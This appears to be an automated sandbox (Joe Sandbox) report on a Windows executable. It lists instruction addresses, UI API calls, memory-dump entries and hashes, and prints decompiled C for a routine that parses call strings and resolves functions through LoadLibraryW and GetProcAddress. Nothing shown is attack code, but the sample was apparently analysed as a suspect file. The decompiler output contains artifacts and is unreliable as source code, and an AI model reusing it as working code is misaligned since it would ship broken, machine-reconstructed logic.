                                                        0x00405119
                                                        0x0040511b
                                                        0x0040511d
                                                        0x00405123
                                                        0x0040512a
                                                        0x0040512f
                                                        0x00405136
                                                        0x00405139
                                                        0x00405139
                                                        0x00405140
                                                        0x0040514c
                                                        0x00405150
                                                        0x00405152
                                                        0x00405152
                                                        0x00405142
                                                        0x00405144
                                                        0x00405144
                                                        0x00405172
                                                        0x0040517e
                                                        0x0040518d
                                                        0x0040518d
                                                        0x0040518f
                                                        0x00405192
                                                        0x0040519b
                                                        0x00000000
                                                        0x004050a2
                                                        0x004050ad
                                                        0x004050b0
                                                        0x004050b5
                                                        0x004050b7
                                                        0x004050bb
                                                        0x004050cb
                                                        0x004050d5
                                                        0x004050d7
                                                        0x004050da
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004050bd
                                                        0x004050bd
                                                        0x004050c3
                                                        0x004050c5
                                                        0x004050c5
                                                        0x004050c6
                                                        0x004050c7
                                                        0x00000000
                                                        0x004050bd
                                                        0x004050a0
                                                        0x0040507b
                                                        0x00404fbe
                                                        0x00000000
                                                        0x00404fd4
                                                        0x00404fde
                                                        0x00404fe3
                                                        0x00000000
                                                        0x00000000
                                                        0x00404ff5
                                                        0x00404ffa
                                                        0x00405006
                                                        0x00405006
                                                        0x00405008
                                                        0x00405017
                                                        0x00405019
                                                        0x0040501d
                                                        0x00405020
                                                        0x00000000
                                                        0x00405020
                                                        0x00404fbe
                                                        0x00404c7e
                                                        0x00404c83
                                                        0x00404c8c
                                                        0x00404c93
                                                        0x00404ca1
                                                        0x00404cac
                                                        0x00404cb2
                                                        0x00404cc0
                                                        0x00404cd4
                                                        0x00404cd9
                                                        0x00404ce6
                                                        0x00404ceb
                                                        0x00404d01
                                                        0x00404d12
                                                        0x00404d1f
                                                        0x00404d1f
                                                        0x00404d22
                                                        0x00404d28
                                                        0x00404d2a
                                                        0x00404d2d
                                                        0x00404d32
                                                        0x00404d37
                                                        0x00404d39
                                                        0x00404d39
                                                        0x00404d59
                                                        0x00404d59
                                                        0x00404d5b
                                                        0x00404d5c
                                                        0x00404d61
                                                        0x00404d64
                                                        0x00404d67
                                                        0x00404d6b
                                                        0x00404d70
                                                        0x00404d75
                                                        0x00404d79
                                                        0x00404d7e
                                                        0x00404d83
                                                        0x00404d85
                                                        0x00404d8d
                                                        0x00404e58
                                                        0x00404e6b
                                                        0x00000000
                                                        0x00404d93
                                                        0x00404d96
                                                        0x00404d99
                                                        0x00404d9c
                                                        0x00404d9c
                                                        0x00404da3
                                                        0x00404da9
                                                        0x00404dac
                                                        0x00404db2
                                                        0x00404db3
                                                        0x00404db8
                                                        0x00404dc1
                                                        0x00404dc8
                                                        0x00404dcb
                                                        0x00404dce
                                                        0x00404dd1
                                                        0x00404e0d
                                                        0x00404e36
                                                        0x00404e0f
                                                        0x00404e1c
                                                        0x00404e1c
                                                        0x00404dd3
                                                        0x00404dd6
                                                        0x00404de5
                                                        0x00404def
                                                        0x00404df7
                                                        0x00404dfe
                                                        0x00404e06
                                                        0x00404e06
                                                        0x00404dd1
                                                        0x00404e3c
                                                        0x00404e3d
                                                        0x00404e49
                                                        0x00404e49
                                                        0x00404e56
                                                        0x00404e71
                                                        0x00404e75
                                                        0x00404e92
                                                        0x00404e97
                                                        0x00000000
                                                        0x00404e77
                                                        0x00404e7c
                                                        0x00404e85
                                                        0x0040520f
                                                        0x00405221
                                                        0x00405221
                                                        0x00404e75
                                                        0x00000000
                                                        0x00404e56
                                                        0x00404d8d

                                                        APIs
                                                        • GetDlgItem.USER32 ref: 00404C44
                                                        • GetDlgItem.USER32 ref: 00404C4F
                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 00404C99
                                                        • LoadBitmapW.USER32(0000006E), ref: 00404CAC
                                                        • SetWindowLongW.USER32 ref: 00404CC5
                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404CD9
                                                        • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404CEB
                                                        • SendMessageW.USER32(?,00001109,00000002), ref: 00404D01
                                                        • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404D0D
                                                        • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404D1F
                                                        • DeleteObject.GDI32(00000000), ref: 00404D22
                                                        • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404D4D
                                                        • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404D59
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404DEF
                                                        • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404E1A
                                                        • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404E2E
                                                        • GetWindowLongW.USER32(?,000000F0), ref: 00404E5D
                                                        • SetWindowLongW.USER32 ref: 00404E6B
                                                        • ShowWindow.USER32(?,00000005), ref: 00404E7C
                                                        • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404F79
                                                        • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404FDE
                                                        • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404FF3
                                                        • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405017
                                                        • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405037
                                                        • ImageList_Destroy.COMCTL32(?), ref: 0040504C
                                                        • GlobalFree.KERNEL32 ref: 0040505C
                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004050D5
                                                        • SendMessageW.USER32(?,00001102,?,?), ref: 0040517E
                                                        • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040518D
                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 004051AD
                                                        • ShowWindow.USER32(?,00000000), ref: 004051FB
                                                        • GetDlgItem.USER32 ref: 00405206
                                                        • ShowWindow.USER32(00000000), ref: 0040520D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                        • String ID: $M$N
                                                        • API String ID: 1638840714-813528018
                                                        • Opcode ID: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                        • Instruction ID: 31f8c2f88752af3cc61dfe1620f9b722711d108b5774519bd23904c74dbe123e
                                                        • Opcode Fuzzy Hash: 0e3101dbd3652d4f757db737ae7fb43f4819026ea9b1eefe658abe3e9785d0fb
                                                        • Instruction Fuzzy Hash: BD0282B0A00209EFDB209F95DD85AAE7BB5FB44314F10417AF610BA2E1C7799D52CF58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 10001B18 Relevance: 25.0, APIs: 13, Strings: 1, Instructions: 544stringmemoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 95%
                                                        			E10001B18() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				WCHAR* _v44;
				signed int _v48;
				void* _v52;
				intOrPtr _v56;
				WCHAR* _t199;
				signed int _t202;
				void* _t204;
				void* _t206;
				WCHAR* _t208;
				void* _t216;
				struct HINSTANCE__* _t217;
				struct HINSTANCE__* _t218;
				struct HINSTANCE__* _t220;
				signed short _t222;
				struct HINSTANCE__* _t225;
				struct HINSTANCE__* _t227;
				void* _t228;
				intOrPtr* _t229;
				void* _t240;
				signed char _t241;
				signed int _t242;
				struct HINSTANCE__* _t248;
				void* _t249;
				signed int _t251;
				short* _t253;
				signed int _t259;
				void* _t260;
				signed int _t263;
				signed int _t266;
				signed int _t267;
				signed int _t272;
				signed int _t273;
				signed int _t274;
				signed int _t275;
				void* _t278;
				void* _t282;
				struct HINSTANCE__* _t284;
				signed int _t287;
				void _t288;
				signed int _t289;
				signed int _t301;
				signed int _t302;
				signed short _t308;
				signed int _t309;
				WCHAR* _t310;
				WCHAR* _t312;
				WCHAR* _t313;
				struct HINSTANCE__* _t314;
				void* _t316;
				signed int _t318;
				void* _t319;

				_t284 = 0;
				_v32 = 0;
				_v36 = 0;
				_v16 = 0;
				_v8 = 0;
				_v40 = 0;
				_t319 = 0;
				_v48 = 0;
				_t199 = E1000121B();
				_v24 = _t199;
				_v28 = _t199;
				_v44 = E1000121B();
				_t309 = E10001243();
				_v52 = _t309;
				_v12 = _t309;
				while(1) {
					_t202 = _v32;
					_v56 = _t202;
					if(_t202 != _t284 && _t319 == _t284) {
						break;
					}
					_t308 =  *_t309;
					_t287 = _t308 & 0x0000ffff;
					_t204 = _t287 - _t284;
					if(_t204 == 0) {
						_t33 =  &_v32;
						 *_t33 = _v32 | 0xffffffff;
						__eflags =  *_t33;
						L17:
						_t206 = _v56 - _t284;
						if(_t206 == 0) {
							__eflags = _t319 - _t284;
							 *_v28 = _t284;
							if(_t319 == _t284) {
								_t319 = GlobalAlloc(0x40, 0x1ca4);
								 *(_t319 + 0x1010) = _t284;
								 *(_t319 + 0x1014) = _t284;
							}
							_t288 = _v36;
							_t43 = _t319 + 8; // 0x8
							_t208 = _t43;
							_t44 = _t319 + 0x808; // 0x808
							_t310 = _t44;
							 *_t319 = _t288;
							_t289 = _t288 - _t284;
							__eflags = _t289;
							 *_t208 = _t284;
							 *_t310 = _t284;
							 *(_t319 + 0x1008) = _t284;
							 *(_t319 + 0x100c) = _t284;
							 *(_t319 + 4) = _t284;
							if(_t289 == 0) {
								__eflags = _v28 - _v24;
								if(_v28 == _v24) {
									goto L39;
								}
								_t316 = 0;
								GlobalFree(_t319);
								_t319 = E10001311(_v24);
								__eflags = _t319 - _t284;
								if(_t319 == _t284) {
									goto L39;
								} else {
									goto L32;
								}
								while(1) {
									L32:
									_t240 =  *(_t319 + 0x1ca0);
									__eflags = _t240 - _t284;
									if(_t240 == _t284) {
										break;
									}
									_t316 = _t319;
									_t319 = _t240;
									__eflags = _t319 - _t284;
									if(_t319 != _t284) {
										continue;
									}
									break;
								}
								__eflags = _t316 - _t284;
								if(_t316 != _t284) {
									 *(_t316 + 0x1ca0) = _t284;
								}
								_t241 =  *(_t319 + 0x1010);
								__eflags = _t241 & 0x00000008;
								if((_t241 & 0x00000008) == 0) {
									_t242 = _t241 | 0x00000002;
									__eflags = _t242;
									 *(_t319 + 0x1010) = _t242;
								} else {
									_t319 = E1000158F(_t319);
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) & 0xfffffff5;
								}
								goto L39;
							} else {
								_t301 = _t289 - 1;
								__eflags = _t301;
								if(_t301 == 0) {
									L28:
									lstrcpyW(_t208, _v44);
									L29:
									lstrcpyW(_t310, _v24);
									L39:
									_v12 = _v12 + 2;
									_v28 = _v24;
									L63:
									if(_v32 != 0xffffffff) {
										_t309 = _v12;
										continue;
									}
									break;
								}
								_t302 = _t301 - 1;
								__eflags = _t302;
								if(_t302 == 0) {
									goto L29;
								}
								__eflags = _t302 != 1;
								if(_t302 != 1) {
									goto L39;
								}
								goto L28;
							}
						}
						if(_t206 != 1) {
							goto L39;
						}
						_t248 = _v16;
						if(_v40 == _t284) {
							_t248 = _t248 - 1;
						}
						 *(_t319 + 0x1014) = _t248;
						goto L39;
					}
					_t249 = _t204 - 0x23;
					if(_t249 == 0) {
						__eflags = _t309 - _v52;
						if(_t309 <= _v52) {
							L15:
							_v32 = _t284;
							_v36 = _t284;
							goto L17;
						}
						__eflags =  *((short*)(_t309 - 2)) - 0x3a;
						if( *((short*)(_t309 - 2)) != 0x3a) {
							goto L15;
						}
						__eflags = _v32 - _t284;
						if(_v32 == _t284) {
							L40:
							_t251 = _v32 - _t284;
							__eflags = _t251;
							if(_t251 == 0) {
								__eflags = _t287 - 0x2a;
								if(_t287 == 0x2a) {
									_v36 = 2;
									L61:
									_t309 = _v12;
									_v28 = _v24;
									_t284 = 0;
									__eflags = 0;
									L62:
									_t318 = _t309 + 2;
									__eflags = _t318;
									_v12 = _t318;
									goto L63;
								}
								__eflags = _t287 - 0x2d;
								if(_t287 == 0x2d) {
									L131:
									__eflags = _t308 - 0x2d;
									if(_t308 != 0x2d) {
										L134:
										_t253 = _t309 + 2;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L141:
											_v28 =  &(_v28[0]);
											 *_v28 = _t308;
											goto L62;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L141;
										}
										_v36 = 1;
										L137:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 = _t284;
										} else {
											 *_v28 = _t284;
											lstrcpyW(_v44, _v24);
										}
										goto L61;
									}
									_t253 = _t309 + 2;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										goto L134;
									}
									_v36 = 3;
									goto L137;
								}
								__eflags = _t287 - 0x3a;
								if(_t287 != 0x3a) {
									goto L141;
								}
								goto L131;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L74:
								_t260 = _t287 - 0x22;
								__eflags = _t260 - 0x55;
								if(_t260 > 0x55) {
									goto L61;
								}
								switch( *((intOrPtr*)(( *(_t260 + 0x10002230) & 0x000000ff) * 4 +  &M100021CC))) {
									case 0:
										__ecx = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											L115:
											__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
											if( *((intOrPtr*)(__edi + 2)) != __dx) {
												L120:
												 *__ecx =  *__ecx & 0x00000000;
												__ebx = E1000122C(_v24);
												goto L91;
											}
											L116:
											__eflags = __ax;
											if(__ax == 0) {
												goto L120;
											}
											__eflags = __ax - __dx;
											if(__ax == __dx) {
												__edi = __edi + 1;
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__ax =  *__edi;
											 *__ecx =  *__edi;
											__ecx = __ecx + 1;
											__ecx = __ecx + 1;
											__edi = __edi + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__ax =  *__edi;
											__eflags = __ax - __dx;
											if(__ax != __dx) {
												goto L116;
											}
											goto L115;
										}
									case 1:
										_v8 = 1;
										goto L61;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L61;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L79;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L61;
										}
										_v12 = _v12 - 2;
										__ebx = E1000121B();
										 &_v12 = E10001A9F( &_v12);
										__eax = E10001470(__edx, __eax, __edx, __ebx);
										goto L91;
									case 5:
										L99:
										_v20 = _v20 + 1;
										goto L61;
									case 6:
										_push(7);
										goto L107;
									case 7:
										_push(0x19);
										goto L127;
									case 8:
										_push(0x15);
										goto L127;
									case 9:
										_push(0x16);
										goto L127;
									case 0xa:
										_push(0x18);
										goto L127;
									case 0xb:
										_push(5);
										goto L107;
									case 0xc:
										__eax = 0;
										__eax = 1;
										goto L85;
									case 0xd:
										_push(6);
										goto L107;
									case 0xe:
										_push(2);
										goto L107;
									case 0xf:
										_push(3);
										goto L107;
									case 0x10:
										_push(0x17);
										L127:
										_pop(__ebx);
										goto L92;
									case 0x11:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L91;
									case 0x12:
										__ebx = 0xffffffff;
										goto L92;
									case 0x13:
										_v48 = _v48 + 1;
										_push(4);
										_pop(__eax);
										goto L85;
									case 0x14:
										__eax = 0;
										__eflags = 0;
										goto L85;
									case 0x15:
										_push(4);
										L107:
										_pop(__eax);
										L85:
										__edi = _v16;
										__ecx =  *(0x1000305c + __eax * 4);
										__edi = _v16 << 5;
										__edx = 0;
										__edi = (_v16 << 5) + __esi;
										__edx = 1;
										__eflags = _v8 - 0xffffffff;
										_v40 = 1;
										 *(__edi + 0x1018) = __eax;
										if(_v8 == 0xffffffff) {
											L87:
											__ecx = __edx;
											L88:
											__eflags = _v8 - __edx;
											 *(__edi + 0x1028) = __ecx;
											if(_v8 == __edx) {
												__eax =  &_v12;
												__eax = E10001A9F( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x101c)) = _v8;
											_t133 = _v16 + 0x81; // 0x81
											_t133 = _t133 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t133 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x1030)) = 0;
											 *((intOrPtr*)(__edi + 0x102c)) = 0;
											goto L91;
										}
										__eflags = __ecx;
										if(__ecx > 0) {
											goto L88;
										}
										goto L87;
									case 0x16:
										_t262 =  *(_t319 + 0x1014);
										__eflags = _t262 - _v16;
										if(_t262 > _v16) {
											_v16 = _t262;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t262 - (_v36 == 3);
										if(_t262 != _v36 == 3) {
											L79:
											_v40 = 1;
										}
										goto L61;
									case 0x17:
										__eax =  &_v12;
										__eax = E10001A9F( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										L91:
										__eflags = __ebx;
										if(__ebx == 0) {
											goto L61;
										}
										L92:
										__eflags = _v20;
										_v40 = 1;
										if(_v20 != 0) {
											L97:
											__eflags = _v20 - 1;
											if(_v20 == 1) {
												__eax = _v16;
												__eax = _v16 << 5;
												__eflags = __eax;
												 *(__eax + __esi + 0x102c) = __ebx;
											}
											goto L99;
										}
										_v16 = _v16 << 5;
										_t141 = __esi + 0x1030; // 0x1030
										__edi = (_v16 << 5) + _t141;
										__eax =  *__edi;
										__eflags = __eax - 0xffffffff;
										if(__eax <= 0xffffffff) {
											L95:
											__eax = GlobalFree(__eax);
											L96:
											 *__edi = __ebx;
											goto L97;
										}
										__eflags = __eax - 0x19;
										if(__eax <= 0x19) {
											goto L96;
										}
										goto L95;
									case 0x18:
										goto L61;
								}
							}
							_t263 = _t259 - 1;
							__eflags = _t263;
							if(_t263 == 0) {
								_v16 = _t284;
								goto L74;
							}
							__eflags = _t263 != 1;
							if(_t263 != 1) {
								goto L141;
							}
							_t266 = _t287 - 0x21;
							__eflags = _t266;
							if(_t266 == 0) {
								_v8 =  ~_v8;
								goto L61;
							}
							_t267 = _t266 - 0x42;
							__eflags = _t267;
							if(_t267 == 0) {
								L57:
								__eflags = _v8 - 1;
								if(_v8 != 1) {
									_t92 = _t319 + 0x1010;
									 *_t92 =  *(_t319 + 0x1010) &  !0x00000001;
									__eflags =  *_t92;
								} else {
									 *(_t319 + 0x1010) =  *(_t319 + 0x1010) | 1;
								}
								_v8 = 1;
								goto L61;
							}
							_t272 = _t267;
							__eflags = _t272;
							if(_t272 == 0) {
								_push(0x20);
								L56:
								_pop(1);
								goto L57;
							}
							_t273 = _t272 - 9;
							__eflags = _t273;
							if(_t273 == 0) {
								_push(8);
								goto L56;
							}
							_t274 = _t273 - 4;
							__eflags = _t274;
							if(_t274 == 0) {
								_push(4);
								goto L56;
							}
							_t275 = _t274 - 1;
							__eflags = _t275;
							if(_t275 == 0) {
								_push(0x10);
								goto L56;
							}
							__eflags = _t275 != 0;
							if(_t275 != 0) {
								goto L61;
							}
							_push(0x40);
							goto L56;
						}
						goto L15;
					}
					_t278 = _t249 - 5;
					if(_t278 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t284;
						_v20 = _t284;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t284;
						goto L17;
					}
					_t282 = _t278 - 1;
					if(_t282 == 0) {
						_v32 = 2;
						_v8 = _t284;
						_v20 = _t284;
						goto L17;
					}
					if(_t282 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t319 == _t284 ||  *(_t319 + 0x100c) != _t284) {
					L161:
					return _t319;
				} else {
					_t216 =  *_t319 - 1;
					if(_t216 == 0) {
						_t178 = _t319 + 8; // 0x8
						_t312 = _t178;
						__eflags =  *_t312 - _t284;
						if( *_t312 != _t284) {
							_t217 = GetModuleHandleW(_t312);
							__eflags = _t217 - _t284;
							 *(_t319 + 0x1008) = _t217;
							if(_t217 != _t284) {
								L150:
								_t183 = _t319 + 0x808; // 0x808
								_t313 = _t183;
								_t218 = E100015FF( *(_t319 + 0x1008), _t313);
								__eflags = _t218 - _t284;
								 *(_t319 + 0x100c) = _t218;
								if(_t218 == _t284) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t186 = _t319 + 0x80a; // 0x80a
										_t222 = E10001311(_t186);
										__eflags = _t222 - _t284;
										if(_t222 != _t284) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t319 + 0x100c) = GetProcAddress( *(_t319 + 0x1008), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t284;
								if(_v48 != _t284) {
									L157:
									_t313[lstrlenW(_t313)] = 0x57;
									_t220 = E100015FF( *(_t319 + 0x1008), _t313);
									__eflags = _t220 - _t284;
									if(_t220 != _t284) {
										L145:
										 *(_t319 + 0x100c) = _t220;
										goto L161;
									}
									__eflags =  *(_t319 + 0x100c) - _t284;
									L159:
									if(__eflags != 0) {
										goto L161;
									}
									L160:
									_t197 = _t319 + 4;
									 *_t197 =  *(_t319 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L161;
								} else {
									__eflags =  *(_t319 + 0x100c) - _t284;
									if( *(_t319 + 0x100c) != _t284) {
										goto L161;
									}
									goto L157;
								}
							}
							_t225 = LoadLibraryW(_t312);
							__eflags = _t225 - _t284;
							 *(_t319 + 0x1008) = _t225;
							if(_t225 == _t284) {
								goto L160;
							}
							goto L150;
						}
						_t179 = _t319 + 0x808; // 0x808
						_t227 = E10001311(_t179);
						 *(_t319 + 0x100c) = _t227;
						__eflags = _t227 - _t284;
						goto L159;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t176 = _t319 + 0x808; // 0x808
						_t229 = _t176;
						__eflags =  *_t229 - _t284;
						if( *_t229 == _t284) {
							goto L161;
						}
						_t220 = E10001311(_t229);
						L144:
						goto L145;
					}
					if(_t228 != 1) {
						goto L161;
					}
					_t80 = _t319 + 8; // 0x8
					_t285 = _t80;
					_t314 = E10001311(_t80);
					 *(_t319 + 0x1008) = _t314;
					if(_t314 == 0) {
						goto L160;
					}
					 *(_t319 + 0x104c) =  *(_t319 + 0x104c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1050)) = E1000122C(_t285);
					 *(_t319 + 0x103c) =  *(_t319 + 0x103c) & 0x00000000;
					 *((intOrPtr*)(_t319 + 0x1048)) = 1;
					 *((intOrPtr*)(_t319 + 0x1038)) = 1;
					_t89 = _t319 + 0x808; // 0x808
					_t220 =  *(_t314->i + E10001311(_t89) * 4);
					goto L144;
				}
			}































































                                                        0x10001b20
                                                        0x10001b23
                                                        0x10001b26
                                                        0x10001b29
                                                        0x10001b2c
                                                        0x10001b2f
                                                        0x10001b32
                                                        0x10001b34
                                                        0x10001b37
                                                        0x10001b3c
                                                        0x10001b3f
                                                        0x10001b47
                                                        0x10001b4f
                                                        0x10001b51
                                                        0x10001b54
                                                        0x10001b5c
                                                        0x10001b5c
                                                        0x10001b61
                                                        0x10001b64
                                                        0x00000000
                                                        0x00000000
                                                        0x10001b6e
                                                        0x10001b71
                                                        0x10001b76
                                                        0x10001b78
                                                        0x10001beb
                                                        0x10001beb
                                                        0x10001beb
                                                        0x10001bef
                                                        0x10001bf2
                                                        0x10001bf4
                                                        0x10001c16
                                                        0x10001c18
                                                        0x10001c1b
                                                        0x10001c2a
                                                        0x10001c2c
                                                        0x10001c32
                                                        0x10001c32
                                                        0x10001c38
                                                        0x10001c3b
                                                        0x10001c3b
                                                        0x10001c3e
                                                        0x10001c3e
                                                        0x10001c44
                                                        0x10001c46
                                                        0x10001c46
                                                        0x10001c48
                                                        0x10001c4b
                                                        0x10001c4e
                                                        0x10001c54
                                                        0x10001c5a
                                                        0x10001c5d
                                                        0x10001c81
                                                        0x10001c84
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c87
                                                        0x10001c89
                                                        0x10001c97
                                                        0x10001c9a
                                                        0x10001c9c
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c9e
                                                        0x10001c9e
                                                        0x10001c9e
                                                        0x10001ca4
                                                        0x10001ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x10001ca8
                                                        0x10001caa
                                                        0x10001cac
                                                        0x10001cae
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001cae
                                                        0x10001cb0
                                                        0x10001cb2
                                                        0x10001cb4
                                                        0x10001cb4
                                                        0x10001cba
                                                        0x10001cc0
                                                        0x10001cc2
                                                        0x10001cd6
                                                        0x10001cd6
                                                        0x10001cd8
                                                        0x10001cc4
                                                        0x10001cca
                                                        0x10001ccd
                                                        0x10001ccd
                                                        0x00000000
                                                        0x10001c5f
                                                        0x10001c5f
                                                        0x10001c5f
                                                        0x10001c60
                                                        0x10001c68
                                                        0x10001c6c
                                                        0x10001c72
                                                        0x10001c76
                                                        0x10001cde
                                                        0x10001ce1
                                                        0x10001ce5
                                                        0x10001d70
                                                        0x10001d74
                                                        0x10001b59
                                                        0x00000000
                                                        0x10001b59
                                                        0x00000000
                                                        0x10001d74
                                                        0x10001c62
                                                        0x10001c62
                                                        0x10001c63
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c65
                                                        0x10001c66
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c66
                                                        0x10001c5d
                                                        0x10001bf7
                                                        0x00000000
                                                        0x00000000
                                                        0x10001c00
                                                        0x10001c03
                                                        0x10001c10
                                                        0x10001c10
                                                        0x10001c05
                                                        0x00000000
                                                        0x10001c05
                                                        0x10001b7a
                                                        0x10001b7d
                                                        0x10001bce
                                                        0x10001bd1
                                                        0x10001be3
                                                        0x10001be3
                                                        0x10001be6
                                                        0x00000000
                                                        0x10001be6
                                                        0x10001bd3
                                                        0x10001bd8
                                                        0x00000000
                                                        0x00000000
                                                        0x10001bda
                                                        0x10001bdd
                                                        0x10001ced
                                                        0x10001cf0
                                                        0x10001cf0
                                                        0x10001cf2
                                                        0x10002048
                                                        0x1000204b
                                                        0x100020b2
                                                        0x10001d60
                                                        0x10001d63
                                                        0x10001d66
                                                        0x10001d69
                                                        0x10001d69
                                                        0x10001d6b
                                                        0x10001d6c
                                                        0x10001d6c
                                                        0x10001d6d
                                                        0x00000000
                                                        0x10001d6d
                                                        0x1000204d
                                                        0x10002050
                                                        0x10002057
                                                        0x10002057
                                                        0x1000205b
                                                        0x1000206f
                                                        0x1000206f
                                                        0x10002072
                                                        0x10002076
                                                        0x100020be
                                                        0x100020c1
                                                        0x100020c5
                                                        0x00000000
                                                        0x100020c5
                                                        0x10002078
                                                        0x1000207c
                                                        0x00000000
                                                        0x00000000
                                                        0x1000207e
                                                        0x10002085
                                                        0x10002085
                                                        0x1000208b
                                                        0x1000208e
                                                        0x100020aa
                                                        0x10002090
                                                        0x10002099
                                                        0x1000209c
                                                        0x1000209c
                                                        0x00000000
                                                        0x1000208e
                                                        0x1000205d
                                                        0x10002060
                                                        0x10002064
                                                        0x00000000
                                                        0x00000000
                                                        0x10002066
                                                        0x00000000
                                                        0x10002066
                                                        0x10002052
                                                        0x10002055
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x10002055
                                                        0x10001cf8
                                                        0x10001cf8
                                                        0x10001cf9
                                                        0x10001e29
                                                        0x10001e29
                                                        0x10001e2e
                                                        0x10001e31
                                                        0x00000000
                                                        0x00000000
                                                        0x10001e3e
